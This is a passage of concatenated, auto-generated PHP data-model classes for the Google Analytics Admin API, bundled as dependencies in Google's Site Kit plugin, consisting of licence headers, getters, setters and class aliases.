$andGroup; } /** * @return GoogleAnalyticsAdminV1alphaAccessFilterExpressionList */ public function getAndGroup() { return $this->andGroup; } /** * @param GoogleAnalyticsAdminV1alphaAccessFilterExpression */ public function setNotExpression(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessFilterExpression $notExpression) { $this->notExpression = $notExpression; } /** * @return GoogleAnalyticsAdminV1alphaAccessFilterExpression */ public function getNotExpression() { return $this->notExpression; } /** * @param GoogleAnalyticsAdminV1alphaAccessFilterExpressionList */ public function setOrGroup(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessFilterExpressionList $orGroup) { $this->orGroup = $orGroup; } /** * @return GoogleAnalyticsAdminV1alphaAccessFilterExpressionList */ public function getOrGroup() { return $this->orGroup; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessFilterExpression::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAccessFilterExpression'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaAccessOrderBy extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $desc; protected $dimensionType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessOrderByDimensionOrderBy::class; protected $dimensionDataType = ''; protected $metricType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessOrderByMetricOrderBy::class; protected $metricDataType = ''; /** * @param bool */ public function setDesc($desc) { $this->desc = $desc; } /** * @return bool */ public function getDesc() { return $this->desc; } /** * @param GoogleAnalyticsAdminV1betaAccessOrderByDimensionOrderBy */ public function setDimension(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessOrderByDimensionOrderBy $dimension) { $this->dimension = $dimension; } /** * @return GoogleAnalyticsAdminV1betaAccessOrderByDimensionOrderBy */ public function getDimension() { return $this->dimension; } /** * @param GoogleAnalyticsAdminV1betaAccessOrderByMetricOrderBy */ public function setMetric(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessOrderByMetricOrderBy $metric) { $this->metric = $metric; } /** * @return GoogleAnalyticsAdminV1betaAccessOrderByMetricOrderBy */ public function getMetric() { return $this->metric; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessOrderBy::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaAccessOrderBy'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaCreateUserLinkRequest extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $notifyNewUser; /** * @var string */ public $parent; protected $userLinkType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaUserLink::class; protected $userLinkDataType = ''; /** * @param bool */ public function setNotifyNewUser($notifyNewUser) { $this->notifyNewUser = $notifyNewUser; } /** * @return bool */ public function getNotifyNewUser() { return $this->notifyNewUser; } /** * @param string */ public function setParent($parent) { $this->parent = $parent; } /** * @return string */ public function getParent() { return $this->parent; } /** * @param GoogleAnalyticsAdminV1alphaUserLink */ public function setUserLink(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaUserLink $userLink) { $this->userLink = $userLink; } /** * @return GoogleAnalyticsAdminV1alphaUserLink */ public function getUserLink() { return $this->userLink; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaCreateUserLinkRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaCreateUserLinkRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAccessOrderBy extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $desc; protected $dimensionType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessOrderByDimensionOrderBy::class; protected $dimensionDataType = ''; protected $metricType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessOrderByMetricOrderBy::class; protected $metricDataType = ''; /** * @param bool */ public function setDesc($desc) { $this->desc = $desc; } /** * @return bool */ public function getDesc() { return $this->desc; } /** * @param GoogleAnalyticsAdminV1alphaAccessOrderByDimensionOrderBy */ public function setDimension(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessOrderByDimensionOrderBy $dimension) { $this->dimension = $dimension; } /** * @return GoogleAnalyticsAdminV1alphaAccessOrderByDimensionOrderBy */ public function getDimension() { return $this->dimension; } /** * @param GoogleAnalyticsAdminV1alphaAccessOrderByMetricOrderBy */ public function setMetric(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessOrderByMetricOrderBy $metric) { $this->metric = $metric; } /** * @return GoogleAnalyticsAdminV1alphaAccessOrderByMetricOrderBy */ public function getMetric() { return $this->metric; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessOrderBy::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAccessOrderBy'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaKeyEvent extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $countingMethod; /** * @var string */ public $createTime; /** * @var bool */ public $custom; protected $defaultValueType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaKeyEventDefaultValue::class; protected $defaultValueDataType = ''; /** * @var bool */ public $deletable; /** * @var string */ public $eventName; /** * @var string */ public $name; /** * @param string */ public function setCountingMethod($countingMethod) { $this->countingMethod = $countingMethod; } /** * @return string */ public function getCountingMethod() { return $this->countingMethod; } /** * @param string */ public function setCreateTime($createTime) { $this->createTime = $createTime; } /** * @return string */ public function getCreateTime() { return $this->createTime; } /** * @param bool */ public function setCustom($custom) { $this->custom = $custom; } /** * @return bool */ public function getCustom() { return $this->custom; } /** * @param GoogleAnalyticsAdminV1betaKeyEventDefaultValue */ public function setDefaultValue(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaKeyEventDefaultValue $defaultValue) { $this->defaultValue = $defaultValue; } /** * @return GoogleAnalyticsAdminV1betaKeyEventDefaultValue */ public function getDefaultValue() { return $this->defaultValue; } /** * @param bool */ public function setDeletable($deletable) { $this->deletable = $deletable; } /** * @return bool */ public function getDeletable() { return $this->deletable; } /** * @param string */ public function setEventName($eventName) { $this->eventName = $eventName; } /** * @return string */ public function getEventName() { return $this->eventName; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaKeyEvent::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaKeyEvent'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaConversionEvent extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $countingMethod; /** * @var string */ public $createTime; /** * @var bool */ public $custom; protected $defaultConversionValueType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaConversionEventDefaultConversionValue::class; protected $defaultConversionValueDataType = ''; /** * @var bool */ public $deletable; /** * @var string */ public $eventName; /** * @var string */ public $name; /** * @param string */ public function setCountingMethod($countingMethod) { $this->countingMethod = $countingMethod; } /** * @return string */ public function getCountingMethod() { return $this->countingMethod; } /** * @param string */ public function setCreateTime($createTime) { $this->createTime = $createTime; } /** * @return string */ public function getCreateTime() { return $this->createTime; } /** * @param bool */ public function setCustom($custom) { $this->custom = $custom; } /** * @return bool */ public function getCustom() { return $this->custom; } /** * @param GoogleAnalyticsAdminV1betaConversionEventDefaultConversionValue */ public function setDefaultConversionValue(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaConversionEventDefaultConversionValue $defaultConversionValue) { $this->defaultConversionValue = $defaultConversionValue; } /** * @return GoogleAnalyticsAdminV1betaConversionEventDefaultConversionValue */ public function getDefaultConversionValue() { return $this->defaultConversionValue; } /** * @param bool */ public function setDeletable($deletable) { $this->deletable = $deletable; } /** * @return bool */ public function getDeletable() { return $this->deletable; } /** * @param string */ public function setEventName($eventName) { $this->eventName = $eventName; } /** * @return string */ public function getEventName() { return $this->eventName; } /** * @param string */ public function setName($name) { $this->name = $name; } /** * @return string */ public function getName() { return $this->name; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaConversionEvent::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaConversionEvent'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaBatchDeleteUserLinksRequest extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'requests'; protected $requestsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaDeleteUserLinkRequest::class; protected $requestsDataType = 'array'; /** * @param GoogleAnalyticsAdminV1alphaDeleteUserLinkRequest[] */ public function setRequests($requests) { $this->requests = $requests; } /** * @return GoogleAnalyticsAdminV1alphaDeleteUserLinkRequest[] */ public function getRequests() { return $this->requests; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchDeleteUserLinksRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaBatchDeleteUserLinksRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaEnhancedMeasurementSettings extends \Google\Site_Kit_Dependencies\Google\Model { public $fileDownloadsEnabled; public $name; public $outboundClicksEnabled; public $pageChangesEnabled; public $pageLoadsEnabled; public $pageViewsEnabled; public $scrollsEnabled; public $searchQueryParameter; public $siteSearchEnabled; public $streamEnabled; public $uriQueryParameter; public $videoEngagementEnabled; public function setFileDownloadsEnabled($fileDownloadsEnabled) { $this->fileDownloadsEnabled = $fileDownloadsEnabled; } public function getFileDownloadsEnabled() { return $this->fileDownloadsEnabled; } public function setName($name) { $this->name = $name; } public function getName() { return $this->name; } public function setOutboundClicksEnabled($outboundClicksEnabled) { $this->outboundClicksEnabled = $outboundClicksEnabled; } public function getOutboundClicksEnabled() { return $this->outboundClicksEnabled; } public function setPageChangesEnabled($pageChangesEnabled) { $this->pageChangesEnabled = $pageChangesEnabled; } public function getPageChangesEnabled() { return $this->pageChangesEnabled; } public function setPageLoadsEnabled($pageLoadsEnabled) { $this->pageLoadsEnabled = $pageLoadsEnabled; } public function getPageLoadsEnabled() { return $this->pageLoadsEnabled; } public function setPageViewsEnabled($pageViewsEnabled) { $this->pageViewsEnabled = $pageViewsEnabled; } public function getPageViewsEnabled() { return $this->pageViewsEnabled; } public function setScrollsEnabled($scrollsEnabled) { $this->scrollsEnabled = $scrollsEnabled; } public function getScrollsEnabled() { return $this->scrollsEnabled; } public function setSearchQueryParameter($searchQueryParameter) { $this->searchQueryParameter = $searchQueryParameter; } public function getSearchQueryParameter() { return $this->searchQueryParameter; } public function setSiteSearchEnabled($siteSearchEnabled) { $this->siteSearchEnabled = $siteSearchEnabled; } public function getSiteSearchEnabled() { return $this->siteSearchEnabled; } public function setStreamEnabled($streamEnabled) { $this->streamEnabled = $streamEnabled; } public function getStreamEnabled() { return $this->streamEnabled; } public function setUriQueryParameter($uriQueryParameter) { $this->uriQueryParameter = $uriQueryParameter; } public function getUriQueryParameter() { return $this->uriQueryParameter; } public function setVideoEngagementEnabled($videoEngagementEnabled) { $this->videoEngagementEnabled = $videoEngagementEnabled; } public function getVideoEngagementEnabled() { return $this->videoEngagementEnabled; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaEnhancedMeasurementSettings::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaEnhancedMeasurementSettings'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaArchiveCustomMetricRequest extends \Google\Site_Kit_Dependencies\Google\Model { } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaArchiveCustomMetricRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaArchiveCustomMetricRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAudienceSequenceFilterAudienceSequenceStep extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $constraintDuration; protected $filterExpressionType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceFilterExpression::class; protected $filterExpressionDataType = ''; /** * @var bool */ public $immediatelyFollows; /** * @var string */ public $scope; /** * @param string */ public function setConstraintDuration($constraintDuration) { $this->constraintDuration = $constraintDuration; } /** * @return string */ public function getConstraintDuration() { return $this->constraintDuration; } /** * @param GoogleAnalyticsAdminV1alphaAudienceFilterExpression */ public function setFilterExpression(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceFilterExpression $filterExpression) { $this->filterExpression = $filterExpression; } /** * @return GoogleAnalyticsAdminV1alphaAudienceFilterExpression */ public function getFilterExpression() { return $this->filterExpression; } /** * @param bool */ public function setImmediatelyFollows($immediatelyFollows) { $this->immediatelyFollows = $immediatelyFollows; } /** * @return bool */ public function getImmediatelyFollows() { return $this->immediatelyFollows; } /** * @param string */ public function setScope($scope) { $this->scope = $scope; } /** * @return string */ public function getScope() { return $this->scope; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAudienceSequenceFilterAudienceSequenceStep::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAudienceSequenceFilterAudienceSequenceStep'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaAccessStringFilter extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var bool */ public $caseSensitive; /** * @var string */ public $matchType; /** * @var string */ public $value; /** * @param bool */ public function setCaseSensitive($caseSensitive) { $this->caseSensitive = $caseSensitive; } /** * @return bool */ public function getCaseSensitive() { return $this->caseSensitive; } /** * @param string */ public function setMatchType($matchType) { $this->matchType = $matchType; } /** * @return string */ public function getMatchType() { return $this->matchType; } /** * @param string */ public function setValue($value) { $this->value = $value; } /** * @return string */ public function getValue() { return $this->value; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessStringFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaAccessStringFilter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaDataStreamIosAppStreamData extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $bundleId; /** * @var string */ public $firebaseAppId; /** * @param string */ public function setBundleId($bundleId) { $this->bundleId = $bundleId; } /** * @return string */ public function getBundleId() { return $this->bundleId; } /** * @param string */ public function setFirebaseAppId($firebaseAppId) { $this->firebaseAppId = $firebaseAppId; } /** * @return string */ public function getFirebaseAppId() { return $this->firebaseAppId; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaDataStreamIosAppStreamData::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaDataStreamIosAppStreamData'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaListCustomDimensionsResponse extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'customDimensions'; protected $customDimensionsType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaCustomDimension::class; protected $customDimensionsDataType = 'array'; /** * @var string */ public $nextPageToken; /** * @param GoogleAnalyticsAdminV1alphaCustomDimension[] */ public function setCustomDimensions($customDimensions) { $this->customDimensions = $customDimensions; } /** * @return GoogleAnalyticsAdminV1alphaCustomDimension[] */ public function getCustomDimensions() { return $this->customDimensions; } /** * @param string */ public function setNextPageToken($nextPageToken) { $this->nextPageToken = $nextPageToken; } /** * @return string */ public function getNextPageToken() { return $this->nextPageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListCustomDimensionsResponse::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaListCustomDimensionsResponse'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1betaAccessDimensionHeader extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $dimensionName; /** * @param string */ public function setDimensionName($dimensionName) { $this->dimensionName = $dimensionName; } /** * @return string */ public function getDimensionName() { return $this->dimensionName; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaAccessDimensionHeader::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1betaAccessDimensionHeader'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaCancelDisplayVideo360AdvertiserLinkProposalRequest extends \Google\Site_Kit_Dependencies\Google\Model { } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaCancelDisplayVideo360AdvertiserLinkProposalRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaCancelDisplayVideo360AdvertiserLinkProposalRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAccessInListFilter extends \Google\Site_Kit_Dependencies\Google\Collection { protected $collection_key = 'values'; /** * @var bool */ public $caseSensitive; /** * @var string[] */ public $values; /** * @param bool */ public function setCaseSensitive($caseSensitive) { $this->caseSensitive = $caseSensitive; } /** * @return bool */ public function getCaseSensitive() { return $this->caseSensitive; } /** * @param string[] */ public function setValues($values) { $this->values = $values; } /** * @return string[] */ public function getValues() { return $this->values; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAccessInListFilter::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAccessInListFilter'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaAuditUserLinksRequest extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var int */ public $pageSize; /** * @var string */ public $pageToken; /** * @param int */ public function setPageSize($pageSize) { $this->pageSize = $pageSize; } /** * @return int */ public function getPageSize() { return $this->pageSize; } /** * @param string */ public function setPageToken($pageToken) { $this->pageToken = $pageToken; } /** * @return string */ public function getPageToken() { return $this->pageToken; } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAuditUserLinksRequest::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_GoogleAnalyticsAdminV1alphaAuditUserLinksRequest'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin; class GoogleAnalyticsAdminV1alphaChangeHistoryChange extends \Google\Site_Kit_Dependencies\Google\Model { /** * @var string */ public $action; /** * @var string */ public $resource; protected $resourceAfterChangeType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaChangeHistoryChangeChangeHistoryResource::class; protected $resourceAfterChangeDataType = ''; protected $resourceBeforeChangeType = \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaChangeHistoryChangeChangeHistoryResource::class; protected $resourceBeforeChangeDataType = ''; /** * @param string */ public function setAction($action) { $this->action = $action; } /** * @return string */ public function getAction() { return $this->action; 